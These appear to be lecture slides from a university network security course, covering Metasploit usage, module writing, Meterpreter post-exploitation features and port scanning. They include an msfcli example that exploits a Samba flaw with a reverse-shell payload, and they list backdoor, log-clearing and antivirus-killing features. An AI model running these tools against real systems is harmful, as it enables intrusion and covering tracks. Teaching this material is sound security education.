Scanners and Metasploit - Network Penetration and Security

EECS 354
Network Security
Metasploit Features
Hacking on the Internet
Vulnerabilities are always being discovered
0day vulnerabilities
Every server or home computer connected to the
Internet is a potential victim
Exploit trust in third party software
Openssl, Apache, IE, VMWare, MySQL, etc
Run on known port numbers
Commonly used and trusted by popular
Hacking on the Internet
Finding vulnerable targets
Most commonly found on search engines (i.e.
Crafted searches
Embedded devices are also a target
“Internet of Things”
Home routers are a hot topic
Vulnerability Types
Arbitrary Code Execution
Most serious
Essentially exposes a shell to the Internet
Privilege Escalation
Often leads to root privilege (i.e. total control)
Total information leakage, total control of server
Vulnerability Types
Other information leakage
Can be serious (i.e. Heartbleed)
Source code
Sensitive user data
Denial of Service
Causing an application or server to run slowly
Causing a application or server to crash
Metasploit is an automated exploitation
Open source, continuous development and
Tools for scanning, exploit development,
exploitation, and post-exploitation
Extensible through plugins and modules
Metasploit Architecture
Metasploit Basic Usage
Writing a Metasploit Module
Metasploit Special Features
Scanning Basics
Most feature-full interface for Metasploit is
Like a shell, just for Metasploit
In addition to special Metasploit commands,
also accepts bash commands
ping, ls, curl, etc
Common Commands
like netcat, connects to host on specified port
search module database, by name, platform, app,
cve, and more
List or manipulate your open sessions (shells,
VNC, etc)
Show anything: show modules, exploits, payloads,
options (for selected module)
Basic Usage
Using a module:
(Optional) If your module is not loaded, load it with
(Optional) If you don’t know the name, search for
it with search
Select your module with use
Fill parameters using set (show parameters with
show options)
Run with exploit
Reload and run with rexploit
Metasploit CLI
Sometimes you’d rather not load up the whole
console just to run a single script
Use msfcli to interact with Metasploit from the
Metasploit CLI
root@kali:~# msfcli -h
Usage: /opt/metasploit/msf3/msfcli [mode]
Show available advanced options for this module
Show available actions for this auxiliary module
Run the check routine of the selected module
Execute the selected module
You're looking at it baby!
(I)DS Evasion
Show available ids evasion options for this module
Show available options for this module
Show available payloads for this module
Show information about this module
Show available targets for this exploit module
Metasploit CLI
Example usage:
msfcli exploit/multi/samba/usermap_script \
RHOST= PAYLOAD=cmd/unix/reverse \
<Exploit Module>: path to ruby script
RHOST: remote host
PAYLOAD: shellcode for reverse shell
LHOST: local host
E: execute
Metasploit Basic Usage
Writing a Metasploit Module
Metasploit Special Features
Scanning Basics
Writing Modules
Defines a function called run
Can do simple tasks: fuzzing, scanning, sniffing,
bruteforcing logins
Defines a function called exploit
Requires a payload (shellcode)
Most basic form
Connect to remote host
Send payload
Run handler (sets up reverse shell connection)
Writing Modules
require 'msf/core‘
class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
# set target and payload characteristics, etc
def exploit
Sidenote for Project 4
Project 4 requires writing brute force exploits
Metasploit provides the brute mix-in
include Exploit::Brute
Module overrides the exploit method to call
brute_exploit for each step within an address
Start, stop, step, and (optional) delay are
defined in target.bruteforce
Step of 0 will be automatically resolved to the size
of the payload’s nop sled
Metasploit Basic Usage
Writing a Metasploit Module
Metasploit Special Features
Scanning Basics
Post-Exploitation Tools
Most post-exploitation tools rely on a
meterpreter shell
Meterpreter is a payload that can be selected
with many exploits
A meterpreter shell provides a consistent
cross-platform post-exploitation interface
Also acts as an in-memory stager for loading
additional exploit code remotely
Meterpreter Basics
Provides basic UNIX interface: ls, cat, cd, pwd,
getuid, ps
Also some convenience features
search: convenient file system searching
migrate: migrate control to another running
clearev: clears logs (Windows only)
upload, download
webcam_list, webcam_snap
More Meterpreter Features
Persistent backdoors with metsvc
John the Ripper integration
Remote packet sniffing
Kill off antivirus
Dump system information
Pretty much anything you can think of
Or you can write your own scripts, too
Metasploit Databases
Very powerful db_* commands
Databases are often used to store hosts, ports,
services, credentials, etc
Can be populated directly from scan results
db_autopwn –p –e
Somewhat controversial command
Very “noisy”
Will attempt to execute all known exploits on all
known hosts on the known open and specified
Scanner Integration
Integration with nmap and Nessus
Can select to send scan results directly to
database for exploitation
Hosts, ports, services, machine info
Simple interface using msfconsole
nmap or db_nmap
load nessus
Or, ‘search portscan’ for auxiliary modules
Metasploit Basic Usage
Writing a Metasploit Module
Metasploit Special Features
Scanning Basics
State-of-the-art scanning tool
Web interface for designing scans
Can set ‘policies’ to get quicker scans
Or, just scan everything and find all services
Associates results with CVE, other references
for easy translation to exploitation
Results are listed by priority
Low -> Critical
Critical vulnerabilities usually can lead to root
shell on a remote machine
Medium-High may mean lower privilege or
limited commands
Ex: default credentials for account user:user
TCP Scanning
TCP SYN scan
Most common
Returns port state
Never opens a full connection, only sends a single
Open: received SYNACK
Filtered: no response (firewalled)
Closed: received RST
Other TCP scans:
FIN, Null, Xmas
UDP Scanning
UDP scans send an arbitrary (or empty) UDP
packet, or a crafted packet for specific ports
(like DNS)
Open/filtered will timeout
Closed will send ICMP unreachable
These responses are often rate limited, making UDP
scans very slow in general
OS Detection and more
Scanners can use OS fingerprinting to detect
an OS based on response characteristics
Scanners also attempt service identification
Services normally run on specified ports
Services can be ‘interrogated’
Sending crafted packets and anticipating particular
responses for particular services